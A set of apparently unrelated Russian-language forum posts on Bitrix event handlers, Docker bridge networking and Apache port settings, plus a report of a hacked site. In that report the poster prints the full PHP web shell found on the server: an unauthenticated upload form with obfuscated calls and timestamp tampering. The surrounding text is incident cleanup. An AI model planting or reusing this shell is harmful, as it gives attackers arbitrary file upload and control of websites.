DYLAN

Ну смотрите, у вас есть браузер и сервер. Если событие наступило на сервере, то это состояние нужно куда-то сохранить, лучше всего это сделать в БД, если у вас свой кастомный модуль, то вы можете сохранить это событие в общую таблицу с настройками модулей или создать таблицу, например через HL Блок.

Для вставки формы я бы лучше использовал событие OnEndBufferContent, перехватывал бы контент и вставлял JS после тэга
</body>
к примеру. Ну и в этом событии можно проверять условие из таблицы и принимать решение о вставке формы.

Ещё из интересного почему блок Containers пуcт

[iam@localhost ~]$ docker network inspect bridge
[
    {
        "Name": "bridge",
        "Id": "bf73901df41df980c3619a2eb9281039edd09dab4768468fa08487e3f4d248b2",
        "Created": "2020-03-30T17:47:12.591249611-04:00",
        "Scope": "local",
        "Driver": "bridge",
        "EnableIPv6": false,
        "IPAM": {
            "Driver": "default",
            "Options": null,
            "Config": [
                {
                    "Subnet": "172.17.0.0/16",
                    "Gateway": "172.17.0.1"
                }
            ]
        },
        "Internal": false,
        "Attachable": false,
        "Ingress": false,
        "ConfigFrom": {
            "Network": ""
        },
        "ConfigOnly": false,
        "Containers": {},
        "Options": {
            "com.docker.network.bridge.default_bridge": "true",
            "com.docker.network.bridge.enable_icc": "true",
            "com.docker.network.bridge.enable_ip_masquerade": "true",
            "com.docker.network.bridge.host_binding_ipv4": "0.0.0.0",
            "com.docker.network.bridge.name": "docker0",
            "com.docker.network.driver.mtu": "1500"
        },
        "Labels": {}
    }
]

Получилось, однако логически не получается установить точную связь.

Если в настройках апатча указать имя сервера со схемой и портом (ServerName https://site1.ru:443), то массив становится таким:
$_SERVER['REQUEST_SCHEME'] = 'https'
$_SERVER['SERVER_PORT'] = '443'

Однако на сайте ссылки строятся неправильно и ведут на site1.ru , однако если включить UseCanonicalPhysicalPort On, то ссылки на сайте лечатся, однако пока не удается понять логику

по логам отследил некий файл license.php через который загружались файлы

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-utf-8">
<title>utf</title>
</head>
<body>
<?php
print "<h1>#p@$c@#</h1>\n";
echo "Your IP: ";
echo $_SERVER['REMOTE_ADDR'];
echo "<form method=\"post\" enctype=\"multipart/form-data\">\n";
echo "<input type=\"file\" name=\"filename\"><br> \n";
echo "<input type=\"submit\" value=\"LOAD\"><br>\n";
echo "</form>\n";
if(is_uploaded_file/*;*/($_FILES["filename"]["tmp_name"]))
	{
	move_uploaded_file/*;*/($_FILES["filename"]["tmp_name"], $_FILES["filename"]["name"]);
	$file = $_FILES/*;*/["filename"]["name"];
	echo "<a href=\"$file\">$file</a>";
	} else {
	echo("empty");
	}
$filename = $_SERVER[SCRIPT_FILENAME];
touch/*;*/($filename, $time);
?>
</body>
</html>

Однако дата создания у него не известна, соответственно нельзя точно понять, когда произошло заражение и через что =((

с помощью решения "Поиск троянов" из маркет плейса нашел ещё кучу файлов зашифрованным php кодом, заменил все пароли, будемс ждать

Оплати подписку или найди в руткере видео ITVDN по Unity

А что если используется хостинг, а не VDS, или данное решение получится сделать исключительно на VDS